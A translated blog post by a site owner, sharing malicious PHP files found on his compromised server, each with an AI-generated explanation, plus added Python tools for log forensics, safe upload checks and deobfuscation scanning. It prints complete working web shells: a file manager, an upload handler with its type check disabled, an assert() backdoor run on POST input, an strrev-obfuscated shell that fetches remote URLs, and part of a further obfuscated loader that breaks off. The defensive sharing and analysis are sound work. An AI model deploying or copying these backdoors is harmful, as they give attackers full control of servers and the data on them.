PHP Malicious Intrusion and File Tampering Cases - Server Security - Website Security

This article is an original work of 宇柒云阁 and is provided for reference only!

Preface


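Recently my server has repeatedly been broken into by animals who maliciously tamper with the website files. They are simply wild beasts with no mother to bear them and no father to raise them; even a butcher would find them disgusting in the slaughterhouse. Never mind, I will stop cursing, otherwise I would dirty my own mouth and pollute everyone's eyes. This article shares those malicious files in the hope that everyone can guard against them. It is best to install a WEB firewall and tamper protection on the server; of course, if a real expert could share a handling plan and prevention measures, that would be even better!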

Malicious PHP file 1

<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>#I LOVE YOU EVERDAY#</title>
    <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0-alpha1/dist/css/bootstrap.min.css" rel="stylesheet"
        integrity="sha384-GLhlTQ8iRABdZLl6O3oVMWSktQOp6b7In1Zl3/Jr59b6EGGoI1aFkw7cmDA6j6gD" crossorigin="anonymous">
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.3.0/css/all.min.css"
        integrity="sha512-SzlrxWUlpfuzQ+pcUCosxcglQRNAq/DZjVsC0lE40xsADsfeQoEypE+enwcOiGjk/bSuGGKHEyjSoQ1zVisanQ=="
        crossorigin="anonymous" referrerpolicy="no-referrer" />
</head>

<body>

    <?php
$url1 = $_SERVER['PHP_SELF'];  
$filename1 = @end(explode('/',$url1));  
function set_writeable($file_name)
{@chmod($file_name,0444);} 
set_writeable($filename1);

    //function
    function formatSizeUnits($bytes)
    {
        if ($bytes >= 1073741824) {
            $bytes = number_format($bytes / 1073741824, 2) . ' GB';
        } elseif ($bytes >= 1048576) {
            $bytes = number_format($bytes / 1048576, 2) . ' MB';
        } elseif ($bytes >= 1024) {
            $bytes = number_format($bytes / 1024, 2) . ' KB';
        } elseif ($bytes > 1) {
            $bytes = $bytes . ' bytes';
        } elseif ($bytes == 1) {
            $bytes = $bytes . ' byte';
        } else {
            $bytes = '0 bytes';
        }
        return $bytes;
    }

    function fileExtension($file)
    {
        return substr(strrchr($file, '.'), 1);
    }

    function fileIcon($file)
    {
        $imgs = array("apng", "avif", "gif", "jpg", "jpeg", "jfif", "pjpeg", "pjp", "png", "svg", "webp");
        $audio = array("wav", "m4a", "m4b", "mp3", "ogg", "webm", "mpc");
        $ext = strtolower(fileExtension($file));
        if ($file == "error_log") {
            return '<i class="fa-sharp fa-solid fa-bug"></i> ';
        } elseif ($file == ".htaccess") {
            return '<i class="fa-solid fa-hammer"></i> ';
        }
        if ($ext == "html" || $ext == "htm") {
            return '<i class="fa-brands fa-html5"></i> ';
        } elseif ($ext == "php" || $ext == "phtml") {
            return '<i class="fa-brands fa-php"></i> ';
        } elseif (in_array($ext, $imgs)) {
            return '<i class="fa-regular fa-images"></i> ';
        } elseif ($ext == "css") {
            return '<i class="fa-brands fa-css3"></i> ';
        } elseif ($ext == "txt") {
            return '<i class="fa-regular fa-file-lines"></i> ';
        } elseif (in_array($ext, $audio)) {
            return '<i class="fa-duotone fa-file-music"></i> ';
        } elseif ($ext == "py") {
            return '<i class="fa-brands fa-python"></i> ';
        } elseif ($ext == "js") {
            return '<i class="fa-brands fa-js"></i> ';
        } else {
            return '<i class="fa-solid fa-file"></i> ';
        }
    }

    function encodePath($path)
    {
        $a = array("/", "\\", ".", ":");
        $b = array("ক", "খ", "গ", "ঘ");
        return str_replace($a, $b, $path);
    }
    function decodePath($path)
    {
        $a = array("/", "\\", ".", ":");
        $b = array("ক", "খ", "গ", "ঘ");
        return str_replace($b, $a, $path);
    }



    $root_path = __DIR__;
    if (isset($_GET['p'])) {
        if (empty($_GET['p'])) {
            $p = $root_path;
        } elseif (!is_dir(decodePath($_GET['p']))) {
            echo ("<script>\nalert('Directory is Corrupted and Unreadable.');\nwindow.location.replace('?');\n</script>");
        } elseif (is_dir(decodePath($_GET['p']))) {
            $p = decodePath($_GET['p']);
        }
    } elseif (isset($_GET['q'])) {
        if (!is_dir(decodePath($_GET['q']))) {
            echo ("<script>window.location.replace('?p=');</script>");
        } elseif (is_dir(decodePath($_GET['q']))) {
            $p = decodePath($_GET['q']);
        }
    } else {
        $p = $root_path;
    }
    define("PATH", $p);

    echo ('
<nav class="navbar navbar-light" style="background-color: #e3f2fd;">
  <div class="navbar-brand">
  <a href="?"><img src="https://github.com/fluidicon.png" width="30" height="30" ></a>
');

    $path = str_replace('\\', '/', PATH);
    $paths = explode('/', $path);
    foreach ($paths as $id => $dir_part) {
        if ($dir_part == '' && $id == 0) {
            $a = true;
            echo "<a href=\"?p=/\">/</a>";
            continue;
        }
        if ($dir_part == '')
            continue;
        echo "<a href='?p=";
        for ($i = 0; $i <= $id; $i++) {
            echo str_replace(":", "ঘ", $paths[$i]);
            if ($i != $id)
                echo "ক";
        }
        echo "'>" . $dir_part . "</a>/";
    }
    echo ('
</div>
<div class="form-inline">
<a href="?upload&q=' . urlencode(encodePath(PATH)) . '"><button class="btn btn-dark" type="button">Upload File</button></a>
<a href="?"><button type="button" class="btn btn-dark">HOME</button></a> 
</div>
</nav>');


    if (isset($_GET['p'])) {

        //fetch files
        if (is_readable(PATH)) {
            $fetch_obj = scandir(PATH);
            $folders = array();
            $files = array();
            foreach ($fetch_obj as $obj) {
                if ($obj == '.' || $obj == '..') {
                    continue;
                }
                $new_obj = PATH . '/' . $obj;
                if (is_dir($new_obj)) {
                    array_push($folders, $obj);
                } elseif (is_file($new_obj)) {
                    array_push($files, $obj);
                }
            }
        }
        echo '
<table class="table table-hover">
  <thead>
    <tr>
      <th scope="col">Name</th>
      <th scope="col">Size</th>
      <th scope="col">Modified</th>
      <th scope="col">Perms</th>
      <th scope="col">Actions</th>
    </tr>
  </thead>
  <tbody>
';
        foreach ($folders as $folder) {
            echo "    <tr>
      <td><i class='fa-solid fa-folder'></i> <a href='?p=" . urlencode(encodePath(PATH . "/" . $folder)) . "'>" . $folder . "</a></td>
      <td><b>---</b></td>
      <td>". date("F d Y H:i:s.", filemtime(PATH . "/" . $folder)) . "</td>
      <td>0" . substr(decoct(fileperms(PATH . "/" . $folder)), -3) . "</a></td>
      <td>
      <a title='Rename' href='?q=" . urlencode(encodePath(PATH)) . "&r=" . $folder . "'><i class='fa-sharp fa-regular fa-pen-to-square'></i></a>
      <a title='Delete' href='?q=" . urlencode(encodePath(PATH)) . "&d=" . $folder . "'><i class='fa fa-trash' aria-hidden='true'></i></a>
      <td>
    </tr>
";
        }
        foreach ($files as $file) {
            echo "    <tr>
          <td>" . fileIcon($file) . $file . "</td>
          <td>" . formatSizeUnits(filesize(PATH . "/" . $file)) . "</td>
          <td>" . date("F d Y H:i:s.", filemtime(PATH . "/" . $file)) . "</td>
          <td>0". substr(decoct(fileperms(PATH . "/" .$file)), -3) . "</a></td>
          <td>
          <a title='Edit File' href='?q=" . urlencode(encodePath(PATH)) . "&e=" . $file . "'><i class='fa-solid fa-file-pen'></i></a>
          <a title='Rename' href='?q=" . urlencode(encodePath(PATH)) . "&r=" . $file . "'><i class='fa-sharp fa-regular fa-pen-to-square'></i></a>
          <a title='Delete' href='?q=" . urlencode(encodePath(PATH)) . "&d=" . $file . "'><i class='fa fa-trash' aria-hidden='true'></i></a>
          <td>
    </tr>
";
        }
        echo "  </tbody>
</table>";
    } else {
        if (empty($_GET)) {
            echo ("<script>window.location.replace('?p=');</script>");
        }
    }
    if (isset($_GET['upload'])) {
        echo '
    <form method="post" enctype="multipart/form-data">
        Select file to upload:
        <input type="file" name="fileToUpload" id="fileToUpload">
        <input type="submit" class="btn btn-dark" value="Upload" name="upload">
    </form>';
    }
    if (isset($_GET['r'])) {
        if (!empty($_GET['r']) && isset($_GET['q'])) {
            echo '
    <form method="post">
        Rename:
        <input type="text" name="name" value="' . $_GET['r'] . '">
        <input type="submit" class="btn btn-dark" value="Rename" name="rename">
    </form>';
            if (isset($_POST['rename'])) {
                $name = PATH . "/" . $_GET['r'];
                if(rename($name, PATH . "/" . $_POST['name'])) {
                    echo ("<script>alert('Renamed.'); window.location.replace('?p=" . encodePath(PATH) . "');</script>");
                } else {
                    echo ("<script>alert('Some error occurred.'); window.location.replace('?p=" . encodePath(PATH) . "');</script>");
                }
            }
        }
    }

    if (isset($_GET['e'])) {
        if (!empty($_GET['e']) && isset($_GET['q'])) {
            echo '
    <form method="post">
        <textarea style="height: 500px;
        width: 90%;" name="data">' . htmlspecialchars(file_get_contents(PATH."/".$_GET['e'])) . '</textarea>
        <br>
        <input type="submit" class="btn btn-dark" value="Save" name="edit">
    </form>';

    if(isset($_POST['edit'])) {
        $filename = PATH."/".$_GET['e'];
        $data = $_POST['data'];
        $open = fopen($filename,"w");
        if(fwrite($open,$data)) {
            echo ("<script>alert('Saved.'); window.location.replace('?p=" . encodePath(PATH) . "');</script>");
        } else {
            echo ("<script>alert('Some error occurred.'); window.location.replace('?p=" . encodePath(PATH) . "');</script>");
        }
        fclose($open);
    }
        }
    }

    if (isset($_POST["upload"])) {
        $target_file = PATH . "/" . $_FILES["fileToUpload"]["name"];
        if (move_uploaded_file($_FILES["fileToUpload"]["tmp_name"], $target_file)) {
            echo "<p>".htmlspecialchars(basename($_FILES["fileToUpload"]["name"])) . " has been uploaded.</p>";
        } else {
            echo "<p>Sorry, there was an error uploading your file.</p>";
        }

    }
    if (isset($_GET['d']) && isset($_GET['q'])) {
        $name = PATH . "/" . $_GET['d'];
        if (is_file($name)) {
            if(unlink($name)) {
                echo ("<script>alert('File removed.'); window.location.replace('?p=" . encodePath(PATH) . "');</script>");
            } else {
                echo ("<script>alert('Some error occurred.'); window.location.replace('?p=" . encodePath(PATH) . "');</script>");
            }
        } elseif (is_dir($name)) {
            if(rmdir($name) == true) {
                echo ("<script>alert('Directory removed.'); window.location.replace('?p=" . encodePath(PATH) . "');</script>");
            } else {
                echo ("<script>alert('Some error occurred.'); window.location.replace('?p=" . encodePath(PATH) . "');</script>");
            }
        }
    }
    ?>

    <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0-alpha1/dist/js/bootstrap.bundle.min.js"
        integrity="sha384-w76AqPfDkMBDXo30jS1Sgez6pr3x5MlQ1ZAGC+nuZB+EYdgRZgiwxhTBTkF7CXvN"
        crossorigin="anonymous"></script>
</body>

</html>
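AI explanation

Functional analysis

  1. Page layout
    • Uses Bootstrap and Font Awesome to provide modern front-end styling.
    • Contains a navigation bar, a file-list table and forms.
  2. File management functions
    • Navigation bar: shows the current path and provides buttons to return to the home page and to upload files.
    • File list: shows the files and subdirectories of the current directory, including name, size, modification time and permissions.
    • File operations
      • Upload file: allows the user to upload files to the current directory.
      • Rename: allows the user to rename files or directories.
      • Delete: allows the user to delete files or directories.
      • Edit file: allows the user to edit the contents of text files.
  3. Path encoding and decoding
    • Uses the custom encodePath and decodePath functions to encode and decode paths, to prevent problems caused by special characters.
  4. File icons
    • Shows a different icon depending on the file extension, using the Font Awesome icon library.
  5. File size formatting
    • Uses the formatSizeUnits function to format file sizes in a readable form (such as KB, MB, GB).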
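
Because encodePath() puts the four Bengali letters into the p= and q= parameters, the file manager above leaves a distinctive trace in web access logs. The following is an added example, not part of the original article: it decodes those parameters and rebuilds a timeline of what was listed, read, overwritten, uploaded or deleted. The log lines, the script name about.php and the addresses are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Substitution table of the sample's encodePath()/decodePath(): the Bengali letters
# U+0995..U+0998 stand for "/", "\", "." and ":" inside the p= and q= parameters.
DECODE = str.maketrans({"\u0995": "/", "\u0996": "\\", "\u0997": ".", "\u0998": ":"})
MARKERS = "\u0995\u0996\u0997\u0998"
LINE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(GET|POST) (\S+) [^"]*"')

# Constructed access-log lines (combined log format); not taken from a real server.
SAMPLE_LOG = """\
203.0.113.7 - - [12/Mar/2025:03:14:07 +0000] "GET /about.php?p=%E0%A6%95var%E0%A6%95www%E0%A6%95html HTTP/1.1" 200 5120
203.0.113.7 - - [12/Mar/2025:03:14:31 +0000] "GET /about.php?q=%E0%A6%95var%E0%A6%95www%E0%A6%95html&e=index.php HTTP/1.1" 200 9044
203.0.113.7 - - [12/Mar/2025:03:15:02 +0000] "POST /about.php?q=%E0%A6%95var%E0%A6%95www%E0%A6%95html&e=index.php HTTP/1.1" 200 9102
203.0.113.7 - - [12/Mar/2025:03:15:40 +0000] "POST /about.php?upload&q=%E0%A6%95var%E0%A6%95www%E0%A6%95html%E0%A6%95%E0%A6%97cache HTTP/1.1" 200 2210
203.0.113.7 - - [12/Mar/2025:03:16:05 +0000] "GET /about.php?q=%E0%A6%95var%E0%A6%95www%E0%A6%95html&d=error_log HTTP/1.1" 200 2188
198.51.100.20 - - [12/Mar/2025:03:16:09 +0000] "GET /search.php?q=php+upload&p=2 HTTP/1.1" 200 7731
""".splitlines()


def classify(method, query):
    """Map the sample's query parameters to the file operation they trigger."""
    if "upload" in query:
        return "upload" if method == "POST" else "upload-form"
    if "e" in query:
        return "overwrite" if method == "POST" else "read"
    if "r" in query:
        return "rename" if method == "POST" else "rename-form"
    if "d" in query:
        return "delete"  # the sample deletes on a plain GET request
    return "list"


def reconstruct(lines):
    """Return (time, client, action, path) for every request that carries an encoded path."""
    events = []
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue
        ip, when, method, target = m.groups()
        query = parse_qs(urlsplit(target).query, keep_blank_values=True)
        encoded = (query.get("p") or query.get("q") or [""])[0]
        # Ordinary p=/q= parameters (page numbers, search terms) carry no marker letters.
        if not any(ch in encoded for ch in MARKERS):
            continue
        directory = encoded.translate(DECODE)
        # e=, r= and d= hold the plain file name relative to the decoded directory.
        name = next((query[k][0] for k in ("e", "r", "d") if k in query), "")
        path = directory.rstrip("/") + "/" + name if name else directory
        events.append((when, ip, classify(method, query), path))
    return events


if __name__ == "__main__":
    for event in reconstruct(SAMPLE_LOG):
        print(*event, sep="  ")
```

The new file name of a rename and the name of an uploaded file travel in the POST body, so they do not appear in the access log and have to be recovered from the file system instead.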

Malicious PHP file 2

<?php
	header("Content-Type:text/html; charset=gb2312");
	if(isset($_POST['submit']))
	{
		$upfiles = new Upload();
		$upfiles->upload_file();
	}
	class Upload
	{
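		/* Author: mckee, from: www.phpddt.com */
		public $upload_name;						// name of the uploaded file
		public $upload_tmp_name;					// temporary name of the uploaded file
		public $upload_final_name;					// final name of the uploaded file
		public $upload_target_dir;					// target directory the file is uploaded to
		public $upload_target_path;					// final path the file is uploaded to
		public $upload_filetype ;					// type of the uploaded file
		public $allow_uploadedfile_type;			// allowed upload file types
		public $upload_file_size;					// size of the uploaded file
		public $allow_uploaded_maxsize=10000000;	// maximum allowed upload size
		// Constructor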
		public function __construct()
		{
			$this->upload_name = $_FILES["file"]["name"]; //取得上传文件名
			$this->upload_filetype = $_FILES["file"]["type"];
			$this->upload_tmp_name = $_FILES["file"]["tmp_name"];
			$this->allow_uploadedfile_type = array('jpeg','jpg','png','gif','bmp','doc','zip','rar','txt','wps');
			$this->upload_file_size = $_FILES["file"]["size"];
			
			// Define the upload path; uploads currently go to the same directory as upload.php
			$this->upload_target_dir="./";
		}
		// File upload
		public function upload_file()
		{
			$upload_filetype = $this->getFileExt($this->upload_name);
			// Restriction on uploaded file types; changing it to if(1) removes the restriction
			if(1)	//in_array($upload_filetype,$this->allow_uploadedfile_type))
			{
				if($this->upload_file_size < $this->allow_uploaded_maxsize)
				{
					if(!is_dir($this->upload_target_dir))
					{
						mkdir($this->upload_target_dir);
						chmod($this->upload_target_dir,0777);
					}
					
					// Define the file name used when storing on the server (by default the same as the original uploaded file)
					$this->upload_final_name = $this->upload_name;		//date("YmdHis").rand(0,100).'.'.$upload_filetype;
					$this->upload_target_path = $this->upload_target_dir."/".$this->upload_final_name;
					if(!move_uploaded_file($this->upload_tmp_name,$this->upload_target_path))
						echo "<font color=red>文件上传失败!</font>";
					else
						echo "<font color=blue>文件上传成功!</font>";
				}
				else
				{
					echo("<font color=red>文件太大,上传失败!</font>");
				}
			}
			else
			{
				echo("不支持此文件类型,请重新选择");
			}
		}
	
		/**
		* Get the file extension
		* @param String $filename the file whose extension is wanted
		*/
		public function getFileExt($filename){
		$info = pathinfo($filename);
		return $info["extension"];
		}
	}
?>


	<form enctype="multipart/form-data" method="POST" action="">
	<input type="file" name="file"><input type="submit" name="submit" value="上传">
	</form>
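AI explanation
  1. Initializing the upload information
    • The constructor __construct initializes the basic information of the uploaded file, such as the file name, temporary file name, file type and file size.
    • Sets the allowed upload file types and the maximum file size.
  2. File type and size checks
    • The upload_file method first checks whether the file type is within the allowed range (in the current code the type check is commented out and if(1) is used, meaning no restriction).
    • Checks whether the file size exceeds the allowed maximum.
  3. Target directory handling
    • If the target directory does not exist, it is created and its permissions are set to 0777 so that all users can read and write it.
  4. File upload
    • Defines the final name and path of the file on the server.
    • Uses the move_uploaded_file function to move the uploaded temporary file to the target path.
    • Outputs a success message if the upload succeeds and an error message if it fails.
  5. Getting the file extension
    • The getFileExt method extracts the file extension from the file name.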
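
For contrast with the handler above, here is the same upload decision with the checks actually enforced. This is an added example, not part of the original article, and it is written in Python rather than PHP: it reuses the sample's declared allow-list and size cap, discards the client-supplied name and path, and creates the directory and file without the 0777 mode. The function names stored_name and store_upload are hypothetical.

```python
import os
import secrets

# Allow-list and size cap as declared (but never enforced) in the sample's Upload class.
ALLOWED_EXT = {"jpeg", "jpg", "png", "gif", "bmp", "doc", "zip", "rar", "txt", "wps"}
MAX_SIZE = 10000000


def stored_name(client_name, size):
    """Validate an upload and return a server-generated file name, or raise ValueError."""
    if "\x00" in client_name:
        raise ValueError("NUL byte in file name")
    # Drop any directory part the client sent, whichever separator it used.
    base = os.path.basename(client_name.replace("\\", "/"))
    stem, dot, ext = base.rpartition(".")
    ext = ext.lower()
    if not dot or not stem:
        raise ValueError("no usable extension")          # e.g. ".htaccess" or "README"
    if ext not in ALLOWED_EXT:
        raise ValueError("extension not allowed: " + ext)  # the check the sample replaces with if(1)
    if not 0 < size < MAX_SIZE:
        raise ValueError("size out of range")
    # Only the validated last extension survives; the client-chosen stem is discarded.
    return secrets.token_hex(16) + "." + ext


def store_upload(upload_dir, client_name, data):
    """Write validated upload data under a random name and return the stored path."""
    name = stored_name(client_name, len(data))
    os.makedirs(upload_dir, mode=0o750, exist_ok=True)   # the sample creates it with 0777
    path = os.path.join(upload_dir, name)
    # O_EXCL refuses to overwrite an existing file; 0o640 sets no execute bit.
    fd = os.open(path, os.O_WRONLY | os.O_CREAT | os.O_EXCL, 0o640)
    with os.fdopen(fd, "wb") as fh:
        fh.write(data)
    return path
```

Keeping the upload directory outside the web root, or configuring the web server not to execute scripts in it, is a separate control that this check does not replace.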

Malicious PHP file 3

<?php $p=base64_decode("bW93YW5n");$i['j']='assert';$a[]=$i;@$a[0]['j']($_POST[$p]);$filename = $php_self=substr($_SERVER['PHP_SELF'],strrpos($_SERVER['PHP_SELF'],'/')+1);function set_writeable($file_name){if(@chmod($file_name,0444)){echo "OK";}else{echo "no";}}set_writeable($filename);?>
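AI explanation

Note: this one is rather nasty, but it has probably already been made public; if you save it as a TXT file and try to upload it on QQ, the upload will fail.

This PHP code looks highly suspicious because it contains potential security vulnerabilities, in particular the risk of remote code execution (RCE). Let's analyze the code in detail:

Code walkthrough

  1. Decoding the variable $p:
       $p = base64_decode("bW93YW5n");
     This line decodes the string "bW93YW5n" from Base64 to "mowang". This means the following code uses the $p variable to access $_POST['mowang'].
  2. Building the array $a and calling assert:
       $i['j'] = 'assert'; $a[] = $i; @$a[0]['j']($_POST[$p]);
     This code creates an array $a whose first element is the associative array $i; the value of $i['j'] is 'assert'. Then $a[0]['j']($_POST[$p]) calls the assert function and passes it the value of $_POST['mowang']. The assert function is used for assertions in PHP, but it can also accept a string argument and execute it as PHP code. So assert($_POST['mowang']) actually executes arbitrary PHP code contained in $_POST['mowang'].
  3. Setting the file permissions:
       $filename = $php_self = substr($_SERVER['PHP_SELF'], strrpos($_SERVER['PHP_SELF'], '/') + 1); function set_writeable($file_name) { if (@chmod($file_name, 0444)) { echo "OK"; } else { echo "no"; } } set_writeable($filename);
     This code gets the file name of the current script and tries to set its permissions to read-only (0444). The @ symbol suppresses any error or warning messages.

Security risks

  1. Remote code execution (RCE): because the assert function can execute the string passed to it as PHP code, an attacker can execute arbitrary code by sending a request whose $_POST['mowang'] contains malicious PHP code. This can lead to full control of the server, data leakage, or even more serious consequences.
  2. File permission issue: although setting the file to read-only prevents some kinds of modification, it cannot fully stop an attacker from exploiting the existing vulnerability. In addition, if the attacker has already gained the ability to execute arbitrary code, they can easily bypass these permission settings.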

Malicious PHP file 4

<?php error_reporting(0);$sr="st"./*+/*+*/"rr"/*+/*+*/."ev";$id=$sr/*+/*+*/("ri"."d_"."si");$rn=$sr/*+/*+*/("em"."an"."er");$dn=$sr/*+/*+*/("em"."anr"."id");$od=$sr/*+/*+*/("ri"."dne"."po");$rd=$sr/*+/*+*/("ri"."dda"."er");$cd=$sr/*+/*+*/("ri"."deso"."lc");$fpc=$sr/*+/*+*/("stn"."etn"."oc_t"."up_e"."lif");$fgc=$sr/*+/*+*/("stn"."etn"."oc_t"."eg_e"."lif");$muf=$sr/*+/*+*/("eli"."f_d"."eda"."olp"."u_e"."vom");$dlform='<form method="post">FN:<input name="fn" size="20" type="text">URL:<input name="url" size="50" type="text"><input type="submit" value="ok"></form>';$ulform='<form method="post" enctype="multipart/form-data"><input name="uf" type="file">SP:<input name="sp" size="50" type="text"><input type="submit" value="ok"></form>';$rnform='<form method="post">ON:<input name="on" size="50" type="text">NN:<input name="nn" size="50" type="text"><input type="submit" value="ok"></form>';$lpform='<form method="post">DP:<input name="dp" size="50" type="text"><input type="submit" value="ok"></form>';$sfform='<form method="post">DF:<input name="df" size="50" type="text"><input type="submit" value="ok"></form>';if($_GET['act']=='dl'){echo($dlform);if($_SERVER['REQUEST_METHOD']=='POST'){$fpc/*+/*+*/($_POST['fn'],$fgc/*+/*+*/($_POST['url']));}exit;}if($_GET['act']=='ul'){echo($ulform);if($_SERVER['REQUEST_METHOD']=='POST'){$sp=empty($_POST['sp'])?'./':$_POST['sp'].'/';$muf/*+/*+*/($/*+/*+*/{"_F"."IL"."ES"}["uf"]["tmp_name"],$sp.$/*+/*+*/{"_F"."IL"."ES"}["uf"]["name"]);}exit;}if($_GET['act']=='rn'){echo($rnform);if($_SERVER['REQUEST_METHOD']=='POST'){$rn/*+/*+*/($_POST['on'],$_POST['nn']);}exit;}if($_GET['act']=='gp'){echo($dn/*+/*+*/(__FILE__));exit;}if($_GET['act']=='lp'){echo($lpform);if($_SERVER['REQUEST_METHOD']=='POST'){$dp=$_POST['dp'].'/';$h=$od/*+/*+*/($dp);while(($fn=$rd/*+/*+*/($h))!==false){if($id/*+/*+*/($dp.$fn)){$t1.='D '.$fn.'<br>';}else{$t2.='  
'.$fn.'<br>';}}$cd/*+/*+*/($dp);echo($dp.'<br>'.$t1.$t2);}exit;}if($_GET['act']=='sf'){echo($sfform);if($_SERVER['REQUEST_METHOD']=='POST'){$df=$_POST['df'];echo('<textarea style="width:100%;height:100%;" wrap="off">'.$fgc/*+/*+*/($df).'</textarea>');}exit;}?>
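AI explanation

The PHP code fragment you provided is a typical Web Shell (web trojan), which allows an attacker to execute arbitrary commands and operate on the file system through the browser. This type of code is very dangerous because it can be used to take full control of the server.

Functions implemented

    • Download file: allows the user to download files through a POST request.
    • Upload file: allows the user to upload files to a specified directory.
    • Rename file: allows the user to rename files.
    • Get current file path: shows the directory path of the current file.
    • List directory contents: shows the contents of a specified directory.
    • View file contents: shows the contents of a specified file.

Security risks

  1. Remote code execution (RCE)
    • An attacker can upload malicious files or execute arbitrary PHP code through these forms and thereby take full control of the server.
  2. File operations
    • An attacker can upload, download, rename and view files on the server, which may lead to leakage of sensitive information or damage to files.
  3. Directory traversal
    • An attacker can list directory contents on the server and learn more about the server's structure.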
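
Samples 3 and 4 hide their function names behind base64_decode, strrev, string concatenation and comments placed between tokens, so a plain search for names such as assert or file_put_contents can miss them. The following is an added example, not part of the original article: a small static scanner that strips comments, folds literal concatenations and decoder calls until nothing changes, and then reports what the variables really hold. The finding labels and the SENSITIVE list are assumptions; SAMPLE_3 and SAMPLE_4 are shortened excerpts of the samples printed above, and BENIGN is constructed.

```python
import base64
import re

# Function names worth flagging when held in a variable (illustrative, not exhaustive).
SENSITIVE = {"assert", "system", "exec", "passthru", "shell_exec", "rename", "unlink",
             "file_put_contents", "file_get_contents", "move_uploaded_file"}
# Decoders resolved statically when they are applied to a plain string literal.
DECODERS = {"strrev": lambda s: s[::-1],
            "base64_decode": lambda s: base64.b64decode(s).decode("latin-1")}

# Group 1 keeps string literals intact; the other alternatives are PHP comments.
TOKEN = re.compile(r"""('(?:\\.|[^'\\])*'|"(?:\\.|[^"\\])*")|/\*.*?\*/|(?://|#)[^\n]*""", re.S)
CONCAT = re.compile(r"""(["'])([^"'\\$]*)\1\s*\.\s*(["'])([^"'\\$]*)\3""")
ASSIGN = re.compile(r"""\$(\w+)(?:\s*\[[^\]]*\])*\s*=\s*(["'])([^"'\\$]*)\2\s*;""")
CALL = re.compile(r"""(\$?\w+)\s*\(\s*(["'])([^"'\\$]*)\2\s*\)""")
REQUEST = r"\$_(?:POST|GET|REQUEST|COOKIE)"

# Shortened excerpts of samples 3 and 4 from this page, plus a constructed benign file.
SAMPLE_3 = r"""<?php $p=base64_decode("bW93YW5n");$i['j']='assert';$a[]=$i;@$a[0]['j']($_POST[$p]);function set_writeable($f){@chmod($f,0444);}"""
SAMPLE_4 = r"""<?php $sr="st"./*+/*+*/"rr"/*+/*+*/."ev";$rn=$sr/*+/*+*/("em"."an"."er");$fpc=$sr/*+/*+*/("stn"."etn"."oc_t"."up_e"."lif");$fgc=$sr/*+/*+*/("stn"."etn"."oc_t"."eg_e"."lif");if($_GET['act']=='dl'){$fpc/*+/*+*/($_POST['fn'],$fgc/*+/*+*/($_POST['url']));}"""
BENIGN = r"""<?php // render a greeting
$greeting = "Hello, " . "world"; /* static text */
echo strrev("olleh"), htmlspecialchars($_GET['name'] ?? '');"""


def normalize(src):
    """Strip comments, then fold literal concatenations and decoder calls to a fixed point."""
    text = TOKEN.sub(lambda m: m.group(1) or "", src)
    aliases = {}  # variable name -> string literal it currently holds

    def resolve(m):
        name = m.group(1)
        func = aliases.get(name[1:], "") if name.startswith("$") else name
        try:
            out = DECODERS[func.lower()](m.group(3))
        except (KeyError, ValueError):
            return m.group(0)
        # Substitute only results that are safe to re-embed as a plain literal.
        return '"%s"' % out if re.fullmatch(r"[\w./ -]*", out) else m.group(0)

    while True:
        before = text
        text = CONCAT.sub(lambda m: '"%s%s"' % (m.group(2), m.group(4)), text)
        aliases.update((m.group(1), m.group(3)) for m in ASSIGN.finditer(text))
        text = CALL.sub(resolve, text)
        if text == before:
            return text, aliases


def scan(src):
    """Return a sorted list of findings for one PHP source string."""
    text, aliases = normalize(src)
    found = set()
    for value in aliases.values():
        name = value.lower()
        if name in SENSITIVE:
            # "hidden" means the name only exists after decoding, so a text search misses it.
            found.add(("stored:" if name in src.lower() else "hidden:") + name)
    if re.search(r"\$\w+(?:\s*\[[^\]]*\])*\s*\(\s*" + REQUEST + r"\b", text):
        found.add("request-input-to-dynamic-call")
    if re.search(r"\$\w+\s*/\*.*?\*/\s*\(", src, re.S):
        found.add("comment-split-call")
    if re.search(r"\bchmod\s*\([^;]*\b0444\s*\)", text):
        found.add("chmod-0444")
    for m in re.finditer(REQUEST + r"\[\s*\$(\w+)\s*\]", text):
        if m.group(1) in aliases:
            found.add("input-key:" + aliases[m.group(1)])
    return sorted(found)


if __name__ == "__main__":
    for label, sample in (("sample 3", SAMPLE_3), ("sample 4", SAMPLE_4), ("benign", BENIGN)):
        print(label, scan(sample))
```

The scanner works on regular expressions, not a PHP parser, so it is a triage aid for files found on a compromised host and not a replacement for reviewing them.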

Malicious PHP file 5


// This is the unencrypted version


<?php
ini_set("memory_limit", "512M");
@ini_set("max_execution_time", 20000);
header("content-Type: text/html; charset=utf-8");
error_reporting(E_ERROR);
@ini_set("display_errors", "Off");
defined("TMQo7") or define("TMQo7", getcwd() . DIRECTORY_SEPARATOR);
defined("sEyyb") or define("sEyyb", __DIR__ . DIRECTORY_SEPARATOR);
$C39VH = $_SERVER["SCRIPT_FILENAME"] ? PBM07($_SERVER["SCRIPT_FILENAME"]) : PBM07(__FILE__);
define("V51MD", $C39VH);
$eMzvo = explode("(", $C39VH);
$C39VH = strpos($C39VH, "eval()") ? array_shift($eMzvo) : $C39VH;
define("k3TER", pBM07(dirname($C39VH) . "/"));
define("FO39n", pbM07(strtr($C39VH, array(PBm07($_SERVER["PHP_SELF"]) => '')) . "/"));
define("NMW2Y", "1.0.0");
if (!isset($gHcBS)) {
    $gHcBS = "d8ec6f4d6590ce92d493eef7190b051c";
}
if (!empty($_GET["ghpqojdsfion1239"]) && !empty($_GET["vqwecsx12312"]) && !empty($_GET["kqishgl194nwq7"])) {
    $s5r3y = cIvgh($_GET["ghpqojdsfion1239"]);
    $dRqNZ = getcwd() . "/" . $_GET["vqwecsx12312"];
    $PfRvL = explode("/", $dRqNZ);
    array_pop($PfRvL);
    $PfRvL = implode("/", $PfRvL);
    if (!file_exists($PfRvL)) {
        mkdir($PfRvL, 0755, "recursive");
        chmod($PfRvL, 0755);
    }
    $YJnbr = C4GhR($PfRvL);
    $ipdt9 = 0;
    foreach ($YJnbr["file"] as $cT1oz => $Kes_q) {
        if (!$ipdt9) {
            $ipdt9 = filemtime($cT1oz);
        } else {
            if (filemtime($cT1oz) < $ipdt9) {
                $ipdt9 = filemtime($cT1oz);
            }
        }
    }
